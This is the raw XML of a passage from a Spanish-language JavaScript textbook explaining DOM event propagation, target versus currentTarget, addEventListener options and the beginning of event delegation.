          <w:p w14:paraId="1F815B4B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Sólo si se registró con </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>capture: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="21F0334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45F352E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Objetivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7387EB3E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>En el elemento mismo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="405898F1" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Siempre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="4FA7FA8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6EC5A47" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Burbujeo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="045018B5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Del elemento hasta </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0FD0931A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Por defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A42DBB7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:spacing w:line="20" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="9020" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9020"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="36730CB0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="85" w:type="dxa"/>
              <w:bottom w:w="85" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71F3F10A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36E1AFE4" wp14:editId="0B2592CD">
                  <wp:extent cx="1372394" cy="43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4-2.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1372394" cy="4320000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76BA7FBF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Epgrafe"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figura 4.2. Las tres fases de propagación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC3AAFC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Casi todo se hace en la fase de burbujeo; la captura sirve para interceptar un evento </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>antes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> de que llegue a su destino. Y hay una excepción: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no todos los eventos burbujean.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>blur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>scroll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> no lo hacen; para los dos primeros existen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>focusin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>focusout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>los que sirven para delegar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (4.8.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C837544" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>El evento trae dos propiedades cuya diferencia es el corazón de la delegación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3684F2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>event.target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> es el elemento donde el evento se originó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4897308C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>event.currentTarget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> es el elemento donde está registrado el manejador que se está ejecutando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2E55A1" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Cuando el manejador está en el elemento mismo, las dos coinciden. Cuando delegás, no.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3C9E594B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="DEEBF7" w:fill="DEEBF7"/>
          </w:tcPr>
          <w:p w14:paraId="6B97FB78" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E74B5"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>PARA ENTENDER: la pelota que cae y rebota</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40971FB5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Pensá el evento como una pelota que </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>cae</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> en un lugar y después </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>rebota</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> hacia arriba por todo el árbol.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A83900" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>target</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> es dónde cayó. Nunca cambia durante todo el recorrido.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="509F6B19" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>currentTarget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> es en qué escalón está rebotando ahora. Cambia en cada nivel.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EDC7D78" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Por eso, en un manejador puesto en la lista, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>currentTarget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> es siempre la lista, pero </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>target</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> es el botón exacto que el usuario tocó. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>target</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> te dice qué hacer; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>currentTarget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>, dónde estás parado.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BC62C4D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>this</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> dentro de un manejador registrado con una función común vale lo mismo que </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>currentTarget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">. Con una flecha, no: ahí </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>this</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> es el del ámbito donde la escribiste, como viste en la sección 3.7.2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21D46B7D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc239320001"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.8.2 — Registro y opciones</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="6D2C5AB2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>elemento.addEventListener("click", manejador, opciones);</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4507"/>
        <w:gridCol w:w="4509"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="1EF98B94"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59A05905" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Opción</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7784067B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Efecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="6CDB4531"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666C8002" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>capture: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6B77C55C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Registra en la fase de captura</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="462AB07F"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2FA62DC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>once: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4AAF67B7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Se ejecuta una vez y </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>se da de baja solo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="69D9501E"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6EC1C9E2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>passive: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1B6AC376" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Promete no llamar a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>preventDefault()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="6A5F57F5"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50E38F53" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="44FE49BB" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Permite dar de baja mediante un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>AbortController</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> (sección 4.9.4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66BE47B7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>passive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> merece explicación porque su efecto es de rendimiento y no de lógica. Ante un desplazamiento o un contacto táctil, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el navegador no puede empezar a desplazar hasta saber si tu manejador va a cancelar el evento</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, y para saberlo tiene que ejecutarlo. Declararlo pasivo es prometer que no lo vas a cancelar: el semáforo que no arranca hasta saber que nadie va a frenar. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Es la diferencia entre un desplazamiento fluido y uno que se traba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD21F08" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc239320002"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.8.3 — Delegación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="13FD50CC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Una lista de cien productos con su botón </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no necesita cien manejadores</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: como los eventos burbujean, alcanza con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
